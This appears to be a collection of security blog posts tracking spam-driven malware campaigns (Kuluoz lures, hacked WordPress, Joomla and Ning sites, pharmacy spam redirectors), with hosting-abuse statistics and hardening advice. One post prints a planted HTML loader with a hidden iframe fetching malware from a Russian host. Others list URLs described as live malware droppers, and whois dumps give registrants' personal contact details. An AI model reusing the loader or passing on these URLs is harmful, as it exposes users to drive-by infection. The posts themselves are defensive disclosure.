Malware attacks after the Boston bombing

Yesterday, in the wake of the bombings in Boston, I received an email that looks like this in my inbox.

The links, needless to say, do not go to CNN. Instead, they lead to

http://playhard.by/bostoncnn.html

*** WARNING *** WARNING *** WARNING ***

This site IS LIVE as of the time of writing this. It WILL attempt to infect your computer with malware. DO NOT visit this site if you don’t know what you’re doing!

playhard.by is a hacked site hosted in Belarus. The URL in the email is a link to a file planted on the site that redirects visitors, using both JavaScript and a REFRESH meta tag, to

http://sub.piecedinnerware.com/complaints/messages_shows_mentions.php

This site is hosted by an outfit called Colo Crossing, a server colocation facility headquartered in the US. The domain was registered through (wait for it…) GoDaddy:

tacit$ whois PIECEDINNERWARE.COM

Domain Name: PIECEDINNERWARE.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS17.DOMAINCONTROL.COM
Name Server: NS18.DOMAINCONTROL.COM
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 19-nov-2012
Creation Date: 19-nov-2012
Expiration Date: 19-nov-2013

>>> Last update of whois database: Thu, 18 Apr 2013 21:42:55 UTC <<< Registrant: Jigar Kapadia B-32, Mani Ratna Raw House, Opp Sai Nagar New Gujarat Gas Road, Adajan Surat, Gujarat 395009 India Administrative Contact: Kapadia, Jigar contact@NewWaysys.com
B-32, Mani Ratna Raw House, Opp Sai Nagar
New Gujarat Gas Road, Adajan
Surat, Gujarat 395009
India
+91.9076026366

Technical Contact:
Kapadia, Jigar contact@NewWaysys.com
B-32, Mani Ratna Raw House, Opp Sai Nagar
New Gujarat Gas Road, Adajan
Surat, Gujarat 395009
India
+91.9076026366

The domain was registered last November, and put into service after the Boston Marathon bombing. (Interestingly, the HTML file that redirects to this site contains the following block of text:

Be sure you have a transfer reference ID. You will be asked to enter it after we check the link. Important: Please be advised that calls to and from your wire service team may be monitored or recorded.

Redirecting to Complain details… Please wait…

This suggests that an ordinary, garden-variety malware attempt, possibly something like a fake PayPal or bank transaction notification, was hastily modified to exploit the Boston attacks.

As per usual, if you receive any emails like this, do not be tempted to click on the links in them.

I expect to start seeing similar emails targeting the explosion at the fertilizer plant in Texas within the next 24 hours.

More on the W32/Kuluoz malware attack

A short time ago, I wrote about a malware attack in which hacked sites were being used to spread the W32/Kuluoz malware. Kuluoz is a password-stealing Trojan; when it’s installed, it scans your password files for Web browsers, password wallets, and so on looking for bank, PayPal, eBay, FTP, and other sites. People infected with Kuluoz may see their bank accounts emptied, their PayPal accounts drained, and if they use FTP to manage Web sites, their Web sites may be infected with the same malware.

Since I first wrote about it, the attack has changed and grown a lot more aggressive.

I saw the first sign of this attack on November 26 of last year. At the time, the attack was still quite crude: the victim would receive an email claiming to be from FedEx (though the body copy of the email said UPS) that had a message saying a package could not be delivered, and the victim would have to click a link to print out a receipt to pick the package up.

The link, of course, went to a hacked Web site being used to spread the malware. Clicking on the link would download a copy of W32/Kuluoz.B, regardless of what kind of computer the user was using. The first infected link I saw was

http://elbosquedelaherrezuela.com/wp-content/plugins/akismet/track.php?c003

hosted on Spanish Web host Arsys. The compromised site was running an outdated copy of WordPress; it has since been pulled down by the host.

In the time between last November and this March, the attack grew more sophisticated. The emails attempting to lure marks to hacked sites got more polished, and grew to resemble actual FedEx emails quite closely. The malware downloaders placed on hacked sites changed; they now examine the browser’s “user agent,” a header that tells a Web site what kind of computer you are using. If you’re on a Mac or Linux computer, you see a bogus “404 not found” error; only if you are on a vulnerable Windows browser does the hacked site download malware. And the malware itself changed rapidly as well; VirusTotal identified the first malware as W32/Kuluoz, but later downloads, with different file sizes and MD5 hashes, are identified as W32/Kuluoz.B or W32/Kuluoz.3.


Since I wrote the report last March, the attack has ramped up significantly and changed again.

At first, in November and December, I averaged 6 emails a month trying to get me to click on links. Now I’m seeing an average of more than 15 of these emails per day.

The emails themselves have changed, too. The fake FedEx emails, though I still get them occasionally, have become quite rare. Instead, the new wave of attacks involves emails that look like American Airlines ticket confirmation emails:

Needless to say, if you get an email that looks like this, DO NOT click on the link.


Right now, there is a hack attack of unprecedented scope and tenacity going on against WordPress and Joomla sites. The attack uses tens of thousands of compromised PCs to try to log in to WordPress and Joomla sites with the username “admin” and a vast number of common passwords. The attack is so severe that some Web hosting companies are reporting that WordPress and Joomla sites on their servers are slow to respond or not loading at all.

I believe that those hack attacks are related to the W32/Kuluoz malware distribution.

I don’t have any direct proof of that. The people attacking WordPress and Joomla sites are covering their tracks well, using botnets and IP spoofing to carry out the attacks.

But the circumstantial evidence seems strong. So far, every single compromised site I’ve seen that’s hosting the Kuluoz downloaders is running WordPress or Joomla. As time has gone on, the number of infected WordPress and Joomla sites has scaled rapidly. The recent wave of emails trying to lure people to infected sites coincides with the ramping up of attacks on WordPress and Joomla sites.

None of this is incontrovertible evidence. It could be coincidence–two different organized crime gangs attacking the same kinds of sites at the same time and ramping up their efforts coincidentally. But my gut says they’re related.


One of the most frustrating parts of this problem, for me, has been how slow Web hosting companies are to respond to reports that their systems have been penetrated and they are hosting computer malware.

I’ve compiled a list of statistics about infected Web hosting companies. Since November 26, I’ve started keeping track of which Web hosting companies are affected by the attack, and how long they’ve taken to remove a malware dropper once they’ve been notified it exists.

Not all Web hosts are created equal. Here, for example, is a graph showing the number of malware infected Web sites I’ve seen on various Web hosts since November, with the Web hosts identified by Spamcop:

The worst of the worst of the lot in terms of sheer number of virus droppers hosted, by a large margin, is GoDaddy.

Now, some ISPs host more Web sites than others, so if all ISPs were equally vigilant (or equally lax) about security you would expect to see larger hosting companies hosting more viruses than smaller companies. But this graph shows that isn’t really how it goes. Hostgator is larger than most the other hosting companies listed here, but has only a small number of malware-infected sites. Dreamhost and OVH are disproportionately represented for their size by a significant margin.


Another place where hosting companies are not created equal is in how speedily they remove malware droppers once they’re notified. The best Web hosting companies will do this within 24-48 hours, which to my mind is still quite a long time to leave a malware dropper active. When I’ve complained to Hostgator, arsys.es, and Lunarpages, for example, they’ve typically taken action quite quickly.

On the other side of the coin, some Web hosting companies take months to remove malware droppers…or don’t remove them at all.

I don’t know if it’s because they are easily fooled by the phony 404 errors or if they simply don’t care, but a number of Web hosting companies on this list appear unwilling or unable to deal with malware-infected sites at all.

The worst of these are Dreamhost (which has not removed one single malware site from its servers–every single one I’ve notified them of, without exception, is still active as of the time of writing this), GoDaddy (which used to be one of the top most responsive Web hosting companies, but no more; sites that they are notified of typically remain active on their servers for months, with one site I notified them of last December finally being taken down this April), OVH (which, like Dreamhost, appears not to deal with malware-infected sites at all), PrivateDNS.com (a site they were notified of in January is still active and spreading malware as of the time of writing this), and, sadly, Bluehost (which keeps emailing me to say the problem is resolved but the malware droppers remain active on their servers nonetheless).

Other ISPs on the Walk of Shame include 1 and 1 (which typically won’t remove a malware dropper until I’ve emailed them three or four times), Peer 1 (which has several malware droppers active for two months or more), and Calpop (which typically leaves malware droppers live for about six weeks after being notified).


Now it’s time for the practical bit.

If you have a WordPress or Joomla Web site, what can you do to keep it secure?

The two most important things you can do are to use very, very strong admin passwords and keep on top of security updates religiously. When a security update for a popular Web package is released, organized crime gangs will examine it and then roll the security holes it fixes into their automated exploit tools, because they know that most people don’t install them right away. If you don’t install a security patch within a day or two of its release, you run the risk of being pwn3d.

So, here’s a quick list of dos and don’ts to run a WordPress or Joomla site:

DO

  • Use strong passwords.
  • Install updates immediately.
  • Consider locking down your /wp-admin or Joomla admin directories with an .htaccess file that does not permit access without a password. If you don’t know how to use .htaccess files, there are some plugins that can do this for you. A WordPress plugin that can lock down your wp-admin directory is Bulletproof Security. A similar Joomla plugin is JHackGuard.
  • If you have more than one WordPress site, install InfiniteWP. This is a WordPress administration console that will notify you by email when any component of any of your WordPress sites needs to be updated, and allow you to update all your sites with one button click. It’s free.
  • If you create your own WordPress or Joomla themes, consider removing the WordPress or Joomla footers. Automated tools are used to scan for these so that the bad guys know what sites to attack.
  • Make sure you remove the /install directories when you install any CMS. (Joomla requires you to do this.)
  • Use a Web host that is proactive about security and responds quickly to abuse complaints.

DO NOT:

  • Assume you don’t have to worry about security because you have a tiny little site that nobody visits. The organized crime groups don’t care what your site is or how much traffic it gets. They use automatic tools that search through hundreds of thousands of Web sites a day searching for vulnerable sites. If you are vulnerable, you will eventually be cracked.
  • Leave your plugins or themes directories indexable. If you don’t know what that means, the easiest way to make sure you’re not indexable is to create an empty file called index.html in your plugins directory and your themes directory. This will keep people from getting a list of all the files in those directories, which they can use to search for vulnerabilities.
  • Set up a WordPress or Joomla Web site and then just walk away from it. If you are not actively maintaining it, take it down.

You have a package! Surprise, it’s the W32/Kuluoz malware!

About three months ago, I got an email telling me that my FedEx package couldn’t be delivered. The body of the email told me that the UPS courier tried to deliver it, and that it would be sent back if I didn’t click on the attached link.

Naturally, as I wasn’t expecting a FedEx pacakge, and given that FedEx presumably knows it isn’t UPS, I knew immediately that clicking the link was a Very Bad Idea…at least on an unsecured Windows box. Sure enough, clicking it downloaded a Windows executable, which VirusTotal identified as W32/Kuluoz, a backdoor command-and-control software that also attempts to download other malware.

I reported the site hosting the malware and forgot about it.

Then, things started to change.


I’ve been getting more and more copies of this email lately; I’m now averaging several a week. The silly error and grammar mistakes have been fixed, and the emails now look quite polished. Here’s an example I received a couple of days ago:

The “Print Receipt” link leads to http://www.123goplus.com/components/.wye6fb.php?receipt=831_1493393532

CAUTION *** CAUTION *** CAUTION

The links in this blog post ARE LIVE as of the time of writing this. If you attempt to visit them with a vulnerable Windows computer, they WILL try to download malware to your computer. DO NOT visit these links if you don’t know what you’re doing!

The site 123goplus.com belongs to a company that produces business cards and similar printed pieces in Montreal, Canada.

$ whois 123goplus.com

Whois Server Version 2.0

Domain Name: 123GOPLUS.COM
Registrar: GODADDY.COM, LLC
Whois Server: whois.godaddy.com
Referral URL: http://registrar.godaddy.com
Name Server: NS1.MTLEXPRESS.CA
Name Server: NS2.MTLEXPRESS.CA
Status: clientDeleteProhibited
Status: clientRenewProhibited
Status: clientTransferProhibited
Status: clientUpdateProhibited
Updated Date: 06-jan-2013
Creation Date: 06-may-2006
Expiration Date: 06-may-2014

>>> Last update of whois database: Thu, 14 Mar 2013 22:32:30 UTC <<< Registrant: Pierino Pezzi 8630 Perra #3 Montreal, Quebec H1E5M8 Canada Administrative Contact: Pezzi, Pierino creationexpress@yahoo.com
8630 Perra #3
Montreal, Quebec H1E5M8
Canada
+1.5142741616

Technical Contact:
Pezzi, Pierino creationexpress@yahoo.com
8630 Perra #3
Montreal, Quebec H1E5M8
Canada
+1.5142741616

Domain servers in listed order:
NS1.MTLEXPRESS.CA
NS2.MTLEXPRESS.CA

The site 123goplus.com is running an outdated, insecure copy of the popular Joomla content management software, which has been hacked to have the malware downloader on it. (Joomla is a common target for this kind of attack. If you run Joomla on your Web site, and you don’t keep on top of security patches religiously, it’s a certainty that you will be hacked–it’s not “if,” it’s “when.”)

Here’s where things get cool.

Visiting this URL from a Mac browser or a Linux browser returns a 404 Not Found page, presumably to fool folks like me into thinking that the problem has been fixed.

Visiting the URL http://www.123goplus.com/components/.wye6fb.php without the “?receipt=831_1493393532” at the end also returns a 404 error; presumably, that code identifies a target that the email has been sent to. The 404 error looks like this:

But hang on! Let’s go to http://www.123goplus.com/fghfghghf and see what a REAL 404 error looks like on this server:

See the difference? The 404 error that you get when you go to the malware dropper is phony. The malware dropper is there, and it does live at that address.

If you visit the malware dropper with your browser user-agent set to, say, Internet Explorer 6 (God help you), you won’t see an error message. Instead, it will download a .zip file called “PostalReceipt.zip”.

I have downloaded several copies of this file from several different compromised hosts over the past couple of months, all of them from nearly identical FedEx emails.

The payload sites vary. Many different sites have been hacked and used to download this malware: 123goplus.com, yourinternationalteam.com, youknowlee.com, theqcontinuum.com, canyonlakeboatstorage.com.

In every case, the site is running an outdated, insecure copy of WordPress or Joomla. The hackers hack the site (which is trivial to do), place a PHP script that downloads the malware, then send out a bunch of these phony emails about a non-existent FedEx package, hoping to trick people into clicking the link.

Most of these sites remain infected, weeks or months after being reported to the ISPs, because either the ISPs don’t care or the ISPs aren’t paying attention to the fact that the malware scripts return phony 404 pages. (GoDaddy and OVH, I’m especially looking at you here.)

The people behind this attack are adapting the malware rapidly. I downloaded three samples of the PostalReceipt.zip file, one on January 25 aqnd two on January 30, and they differ from one another. VirusTotal identifies the earliest one as W32/Kuluoz, the second as W32/Kuluoz.B, and the third as W32/Kuluoz.3.


There are some interesting things about this attack.

The group–and I bet it is a group–of criminals responsible for this attack are taking care to cover their tracks and to keep abuse teams from removing the malware from infected sites. Each spam email contains a code at the end of the malicious URL, and the URL returns a phony error message if it doesn’t see a valid code.

The virus downloader script is smart enough to examine the browser user-agent to see what kind of computer and what Web browser the victim is using. If it sees a browser or a computer that it can’t exploit, it returns a fake error message.

Only if it sees a vulnerable browser does it attempt to download the malwarewhich then surrenders the computer to the control of the hackers.

The malware droppers are installed, probably automatically, on sites running insecure WordPress or Joomla software. The phony 404 error messages slow down the Web hosting companies’ response, so the malware droppers stay active for long periods of time.

I’ve said it before, and I’ll say it again: If you run a Web site that uses a content managemet or blogging or ecommerce package, you *** ABSOLUTELY *** MUST *** check periodically for software updaes and install them immediately. (When a software update comes out, the organized crime gangs that do this kind of attack will analyze it and figure out what security holes it patches. Within days, they will start taking over any Web site that hasn’t installed the update.)

The fact that malicious scripts will cloak themselves behind fake error messages means that you can never trust that a problem has been fixed just because you see a 404 error if you try to look at a suspicious URL.

Computer Security: Enormous Twitter Attack

A while ago, I received a spam email. The email came from an obviously hacked attack, and contained nothing but a Web URL.

This usually means either a phony pharmacy spam or a computer virus. Since I am interested in these things, and since I keep virtual machines with redundant backups so I’m not too concerned about malware, I followed it. It lead to a GoDaddy site which redirected to a PHP redirection script living on a hacked Web site which led in turn to a fake antiviurs page–a page that throws up a phony virus “warning” and prompts the mark to download an antivirus program to “fix” the problem. The supposed “antivirus program” is, of course, actually malware. Pretty run-of-the-mill stuff. I reported it to the Web hosts and moved on.

Then, a few days later, I started seeing Twitter posts that were just a URL. These posts led to a hacked site…which led to the same redirector, which then led on to the same malware sites.

Then I started seeing more. And more and more and more. And still more.

I did a Google search. Just one of the hacked sites, an Indian site called cowmamilk.com, had over 257 **MILLION** mentions on Twitter, which some quick investigating shows were coming from at least 500,000 Twitter accounts that were being used to blast the URL far and wide. 257 million searchable mentions for just a single attack URL!

This is a huge scale attack, flooding Twitter with hundreds of millions of mentions of hacked Web sites that in turn redirect to a traffic handler which then sends visitors on to computer malware.

I did some more investigating, mapping out the patterns of redirections, visiting the sites again and again with my browser user agent set in different ways, watching what happened. After a while, I was able to build a map of the attack, which looks something like this:

And I found some really interesting things.

More technical details, as well as screen shots of the malware sites, under this cut. If you’re interested, clicky here!

Another day, another massive Dreamhost hack attack

A few months back, I wrote about a WordPress attack that affected a friend of mine. The hack was aimed at WordPress installs, and planted very subtle modifications to core WordPress files that redirected users to spam pharmacy sites.

At first, I thought the attack was aimed at unpatched WordPress sites, though my friend’s site was fully patched and updated. As I pursued the patch, I started noticing that a highly disproportionate number of the hacked sites were hosted on the same Web hosting provider my friend’s site lived on: namely, Dreamhost.

Dreamhost, as I observed later, seemed to be hosting quite a number of these hacked sites. And more worrying, the sites were generally fully patched, suggesting somesort of zero-day exploit against Dreamhost’s Web hosting servers.

I made note of it, fired off some emails to Dreamhost’s abuse team, and forgot about it.

Fast forward to today.

Today, I received a number of spam emails that used redirectors planted on hacked sites to redirect to a spam pharmacy page selling fake Viagra. More concerning, the site appeared to be attempting an exploit to download malware. It’s an exploit I’ve seen before, often used to distribute the W32/ZeuS banking Trojan.

In the spam messages I received, the redirect file had the same name: “jbggle.html”, So, curious, I did a Google search for sites with this filename in the URL and discovered quite a large number of hacked sites that redirect to the same spam pharmacy page:

http://cottinghamhuntingclub.com/images/fbfiles/avatars/gallery/jbggle.html
http://www.hesslerdesign.com/clients/alkarsteel.com/images/navigation/jbggle.html
http://theaquilareport.com/images/fbfiles/avatars/gallery/jbggle.html
http://view.ghava.org/cache/Inspiration/Moving_imagery/Stop_frame_animation/Kristofer_Strom/jbggle.html
http://ketchup-mustard.com/sketchbooks/jbggle.html
http://irenderer.com/photo/data/seasonal/1171063984/jbggle.html
http://hisdoulos.com/media/wpmu/uploads/blogs.dir/3/files/jbggle.html
http://bahiarestaurant.net/administrator/components/jbggle.html
http://www.mcc-studio.org/components/com_flexicontent/librairies/phpthumb/cache/source/jbggle.html

*** WARNING *** WARNING *** WARNING ***

All these URLs are live as of the time of this writing. All of them will redirect you to a spam pharmacy Web site which may also attempt to download malware on your server.

And interestingly, ALL of these Web sites is hosted by Dreamhost. Every. Single. One.

I strongly recommend that people steer well clear of Dreamhost. I have not seen this level of compromised Web sites on a single server since the zero-day exploit against iPower Web several years ago.

Dreamhost’s security team seems unwilling or unable to deal with this problem, which is quite disappointing for a large, mainstream Web hosting company.

Edited to add: Within minutes of this blog post going live, I received an email from Dreamhost’s security team that they had started examining the sites on their servers to remove these redirectors. It is not clear from the email whether or not they have identified the exploit being used to plant them, or indeed intend to do so.

Computer Malware in 4 seconds

One of my email inboxes lately has been flooded with spam for phony “Canadian pharmacy” sites (does anyone actually believe that scam? Seriously?) And when I say “flooded,” I mean “50-60 a day or so.”

These spam messages come in two varieties. One is standard straight-ahead spam: an image, sometimes in the email and sometimes loaded remotely loaded from the spam site, that advertises cheap prices on Viagra, and a Web link to the spam pharmacy site itself.

The other variety is different. It’s invariably a message claiming to be a bounced email notification, a greeting card notification, or something along those lines, with an attached HTML file. The HTML file, if it is open, redirects to some poor schmuck’s hacked Web site, where it displays the message

“Please, waiting….. 4 seconds”

Then after 4 seconds, it redirects to the same spam pharmacy sites as the first variety.

“Well, hmm,” I thought to myself, “that’s odd. Why is the redirector waiting for four seconds?”

So I looked at some of the redirector pages, and the answer seems to be “Because the spammers are now shitting where they eat.”


Spammers have used computer viruses and malware for years. That’s nothing new. Most computer spam is sent through home Windows PCs that have been infected by viruses. The viruses install back-door remote control software and email server software on the infected PC; the spammers then take over the infected PC, without the owner knowing, and use it to send spam.

But generally speaking, in the past the spammers have not tried to use their fake pharmacy sites th spread malware. They have preferred to keep the malware and the phony medicine separate; they spread malware through one set of sites, and sell fake prescription meds through another.

Not any more.

The new system attempts to download computer malware onto the computers of people who respond to the spam. Here’s how it works:

Step 1: The spammers hack a poorly secured Web site. Often, these are Web sites run by very small companies, using outdated ecommerce software without security patches. I’ve also seen a whole bunch of these sites hosted on GoDaddy and The Planet; I don’t know if these ISPs are directly being attacked, but they seem to be hosting the bulk of the hacked sites.

Step 2: A file named “index3.html” is placed on the hacked Web site. This file looks like this:

PLEASE, WAITING…. 4 sec

<meta http-equiv=”refresh” content=”4;url=http://knewname.com” />

<iframe src=’http://panlip.ru:8080/index.php?pid=10′ width=’1′ height=’1′ style=’visibility: hidden;’></iframe><br>

Step 3: A spam email is created. The spam email has an attached HTML file that looks like this:

<meta http-equiv=”refresh” content=”0;url=http://designcomforttx.com/index3.html” />

*** WARNING *** WARNING *** WARNING ***
The URLs above and elsewhere in this post are live as of the time of this writing. They WILL attempt to download malware in an iFrame before redirecting to a spam pharmacy site. DO NOT attempt to visit these URLs if you don’t know what you’re doing!

Anyone who opens the HTML file attached to the spam email visits the hacked site, in this case designcomforttx.com. They stay on that site for 4 seconds while a hidden iFrame attempts to download a file from another site, in this case the Russian site panlip.ru, hosted by Tata Communications in India. After 4 seconds, the mark is redirected to a run-of-the-mill Badcow fake “Canadian” pharmacy page, in this case knewname.com, hosted in China.


I have not been able to determine what the iFrame does. On my machine, it downloads blank content. I’ve Googled some of the domains being used in these iFrames (there are several different domains being used in the attacks); some people have claimed that the attack domains examine the user’s browser, then attempt to download a PDF exploit or some other browser exploit if they detect a vulnerable browser configuration.


I’m seeing LOTS of these hacked Web sites, always with a file named “index3.html” and always with a hidden iFrame. The index3.html file always redirects to knewname.com but may first load the iFrame from one of many different sites.

A partial list of hacked sites, some of which are still active at the time of this writing and some of which are not, includes:

designcomforttx.com/index3.html
arenafence.ca/index3.html
powerchurchsoftware.com/index3.html
ektalimoservice.com/index3.html
madeinperu.net/index3.html
whitakermedical.com/index3.html
shaolinmonk.net/index3.html
eyesensations.com/index3.html
trendzmarket.com/index3.html
identigen.com/index3.html
yasetai.com/index3.html
highlandparkbuilders.com/index3.html
retreatsatstonefountain.com/index3.html
3iconstruction.com/index3.html

In each case, the “index3.html” file is virtually identical, with the only difference being the server it attempts to load the iFrame from. Attack domains I have seen used in the iFrames include:

http://panlip.ru:8080/index.php?pid=10
http://sheepbody.com:8080/index.php?pid=10
http://cafemack.com:8080/index.php?pid=10

whois panlip.ru

% By submitting a query to RIPN’s Whois Service
% you agree to abide by the following terms of use:
% http://www.ripn.net/about/servpol.html#3.2 (in Russian)
% http://www.ripn.net/about/en/servpol.html#3.2 (in English).

domain: PANLIP.RU
nserver: ns1.dnsofthost.com.
nserver: ns2.dnsofthost.com.
nserver: ns3.dnsofthost.com.
nserver: ns4.dnsofthost.com.
state: REGISTERED, DELEGATED, VERIFIED
person: Private Person
phone: +7 472 2311731
e-mail: tips@freenetbox.ru
registrar: NAUNET-REG-RIPN
created: 2010.07.05
paid-till: 2011.07.05
source: TCI

whois sheepbody.com

Domain Name: SHEEPBODY.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNSOFTHOST.COM
Name Server: NS2.DNSOFTHOST.COM
Name Server: NS3.DNSOFTHOST.COM
Name Server: NS4.DNSOFTHOST.COM
Status: clientTransferProhibited
Updated Date: 07-jul-2010
Creation Date: 07-jul-2010
Expiration Date: 07-jul-2011

Registrant:
Anna Veprinceva es@qx8.ru +7.4957211411
Anna Veprinceva
ul.Kostromskaya d.4 kv.114
Moskva,Moskva,RU 127549

Registration Service Provider:
name: DNRegistrar.ru
tel: +7.4955041111
fax: +7.4955041111
web:http://www.dnregistrar.ru

whois cafemack.com

Domain Name: CAFEMACK.COM
Registrar: ONLINENIC, INC.
Whois Server: whois.onlinenic.com
Referral URL: http://www.OnlineNIC.com
Name Server: NS1.DNSOFTHOST.COM
Name Server: NS2.DNSOFTHOST.COM
Name Server: NS3.DNSOFTHOST.COM
Name Server: NS4.DNSOFTHOST.COM
Status: clientTransferProhibited
Updated Date: 07-jul-2010
Creation Date: 07-jul-2010
Expiration Date: 07-jul-2011

Registrant:
Alexander Ksalov soy@qx8.ru +7.4957888901
Alexander Ksalov
Izyumskaya ul. d.26 k.2 kv.54
Moskva,Moskva,RU 117042

Registration Service Provider:
name: DNRegistrar.ru
tel: +7.4955041111
fax: +7.4955041111
web:http://www.dnregistrar.ru

The payload site, knewname.com, is pixel-for-pixel identical to the other, more traditional pharmacy spam sites I’m seeing, such as superviagraonline.com. These sites are themselves virtually identical to, and use the same graphics as, other spam sites that places like the Spamtrackers wiki have connected to other Canadian Pharmacy spam (known Canadian Pharmacy spam site on left, knewname.com on right, click either thumbnail for a larger screen shot):

      

Conclusion: The Canadian Pharmacy spammers are directly involved in the writing and/or distribution of malware themselves, and have now begun an experiment in which they attempt to infect their own customers with their malware.

Ning: Where security is something we consider.

A few days ago, I wrote about what appears to be a massive breach at Ning, a social networking platform that allows people to create their own niche social networking sites. The Ning security appears to be compromised, and the social networking sites they host are overrun with automated spam advertising links and redirectors to computer viruses–over a million of them, in fact.

As a good Internet citizen, I dropped an email to Ning alerting them to the problem. I’ve since received back what appears to be a stock form email in response:

Hi there,

Thanks for bringing this to our attention. As you may already know, Ning is a platform that enables individuals to build their own social networks. We aren’t involved in the decisions relating to content uploaded or published by Network Creators or members. In addition, we aren’t involved in the management of the social networks on our platform, or in any of the decisions relating to the focus of social networks created on our platform. That said, we’ll look into this and take action if we determine that our Terms of Service have been violated.

Thanks again!
The Ning Team

ref:00D8cCLt.5004AJJb9:ref

I’ve checked, and the problem still exists. Google is delisting the virus redirectors pretty quickly, but they’re being added even more quickly. Right now, Google shows about 600,000 virus redirectors on various Ning-hosted sites, with many more existing but not listed in Google.

It seems that Ning either does not understand or does not care about the scope of the problem they face.

In a way, I’m not surprised. iPower Web took over a year to fix their security when they were hit with a massive, ongoing server security breach, for example.

But it is disappointing. An executive at Verizon recently wrote an essay deriding security researchers who talk about security issues publicly as “narcissistic vulnerability pimps” who “solely for the purpose of self-glorification and self-gratification – harms business and society by irresponsibly disclosing information that makes things less secure.”

But considering how poorly ISPs and software vendors tend to respond to security problems, and how cavalier they seem to be with the safeguarding of their users’ data, it’s hard to see this essay as anything more than the whining of a crybaby managers who would rather play Quake III Arena than take care of fixing gaping security holes in their systems.

Meantime, I still suggest that anyone hosted on Ning seek hosting elsewhere.

Another day, another massive computer hack attack

Note: followup to this post at http://tacit.livejournal.com/325770.html

I run quite a number of WordPress blogs: weeklysextips.com, the Whispers blog at symtoys.com, the Skeptical Pervert blog (which I haven’t actually started doing anything yet, as I haven’t started my podcast yet), and so on.

These blogs all run comment spam filtering software, because automated WordPress comment spam is a big problem with any WordPress blog. A lot of the automated comment spam contains, of course, redirectors to malware, mostly disguised as porn links.

I occasionally trawl through the spam comments on my blogs; it’s an amazing early warning system to see what the malware writers are up to these days. Recently, I found a spate of malware spam advertising URLs hosted on a Web site called nashville.net; the spam promised all sorts of free sexual delights if I would but go to such Web addresses as

http://www.nashville.net/profile/3nz5lxzvocvcd
and
http://www.nashville.net/profile/jetttoland59

and so on.

I did some poking around on Nashville.net and discovered that it has been compromised like a Senator with a gambling addiction; at the moment, it’s hosting somewhere around 4,200 phony profiles, all of which are redirectors to sites that try to download malware. Each phony profile leads to the same place: a URL at

http://sexsuite.ru/stds/go.php?sid=14

which is a traffic handling Web site that works the same way that the traffic redirector sites used by malware networks I’ve talked about before do.

So I decided to be a good citizen and drop a line to the owner of nashville.net, and his Web host, letting him know he’d been massively breached.

That’s when things got interesting.


The Web site nashville.net is a “community site,” a small niche social networking site hosted by an outfit called Ning.

Parsing input: nashville.net
Routing details for 8.6.19.68
“whois NET-8-6-19-0-1@whois.arin.net” (Getting contact from whois.arin.net )
Found AbuseEmail in whois abuse@ning.com
8.6.19.0 – 8.6.19.255:abuse@ning.com
Using abuse net on abuse@ning.com
abuse net ning.com = postmaster@ning.com, abuse@ning.com, abuse@level3.com

Ning is a personal social networking site founded by the guy who started Netscape, Marc Andreessen. It basically lets you create your own mini MySpace or LiveJournal or whatever you like–a small social networking platform aimed at whatever niche you want. It’s had a checkered past, and has struggled to make money; three days ago, Ning announced that it would become pay only and would cancel its free services. It also fired 40% of its staff.

But that’s not the really interesting part.

The really interesting part is that it looks like all of Ning, with all the social networks and online forums it hosts, has been pwn3d from balls to bones.

A search for some of the exact words and phrases used by the virus redirectors on nashville.net, one of Ning’s social networking sites, produces 1,060,000 results…and as near as I can tell, they are all on Ning.

Now, a conspiracy theorist might come up with all kinds of conspiracies to explain this–disgruntled employees, knowing what was coming, leaving the back door open; executives of a foundering company, desperate for cash, turning a blind eye to Russian malware writers; whatever. I suspect that the reality is what it always is–incompetence, someone asleep at the switch, management that doesn’t appreciate security and doesn’t want to pay for it…the same sorts of things that seem to be behind this sort of thing almost every time.

But if you use Ning, or you know someone who does, my advice is to leave.

Computer security? Best practice? yeah, those are things we’ve heard of.

If you’ve ever run a small business, or done any accounting, you’re probably familiar with Intuit, the company that makes the popular QuickBooks accounting software.

Intuit does a lot of things other than QuickBooks, of course. They are also a business Web hosting company, a payroll tax service, a credit card merchant account company, a computer virus distribution network, and a marketing company, among other things. Not everyone knows about all the services they offer; in particular, their marketing and computer virus distribution services appear to be underrated.

Yep, you read that right. They distribute computer viruses.

Oh, not on purpose, I’m sure. They simply appear to run Web sites whose Webmasters don’t really seem to know a lot about Web security. Which would seem to be about par for the course these days, except that they..err, specialize in software that handles business financial information.

Which is a wee bit concerning, if you use Intuit and would like to feel reassured that they take the security of their network and servers seriously.

Now, to be fair, it’s not actually their main site that has the problem, at least not that I’ve seen so far. Instead, they run many “community” sites, and on some of these sites they appear to have a…relaxed approach to security and best practices.

*** WARNING *** WARNING *** WARNING ***
The URLs listed below are live as of the time of this writing. They WILL try to redirect you to sites that attempt to download malware onto your computer. DO NOT visit these URLs if you don’t know what you’re doing!

While cleaning out the contents of the spam trap on one of the WordPress sites I run, I spotted a large number of spam-trapped comments advertising FREE NUDE PICTURES with URLs of an Intuit-owned property, community.quickbooks.co.uk. Now, I see these spam posts all the time, usually made from machines in Eastern Europe and usualy pointing to sites that try to download the Asprox or Zlob malware.

This particular site, though, is overrun to a large degree even for sites that have security problems. The site itself allows users to create their own profiles, but it does not appear to sanitize the user-supplied profiles for things like JavaScript and it allows users to embed links and images in their profiles.

Which is, when you get right down to it, a recipe for disaster.

Anyway, the community.quickbooks.co.uk Web site is currently home to a large number of fake, automatically-generated profiles which redirect through a series of intermediates to malware sites that use a cocktail of browser exploits and social engineering tricks to try to slip malware onto visitors’ computers.

A smattering of these profiles includes:

http://community.quickbooks.co.uk/discussion/index.php?showuser=57944

http://community.quickbooks.co.uk/discussion/index.php?showuser=58063

http://community.quickbooks.co.uk/discussion/index.php?showuser=58395

http://community.quickbooks.co.uk/discussion/index.php?showuser=57939

Some of these profile sites, unusually, redirect through TinyURL to to destination payload site; others redirect more conventionally, through traffic loader sites in a manner similar to the ones I’ve written about before.

The sites redirect through TinyURL or another traffic loader to several intermediates and eventually end up at a place such as

http://stereotube.net/xfreeporn.php?id=45035

which offers free porn if you download a movie-player codec…which is, of course, a virus. (No free porn for YOU!)

Unsurprisingly, the payload site stereotube.net is registered with bogus information belonging to an identity theft victim; also unsurprisingly, it’s hosted on black-hat Web hosting company Calpop, a California Web host that has a long and ignoble history of knowingly hosing malware sites for Russian organized crime, as I’ve mentioned before.

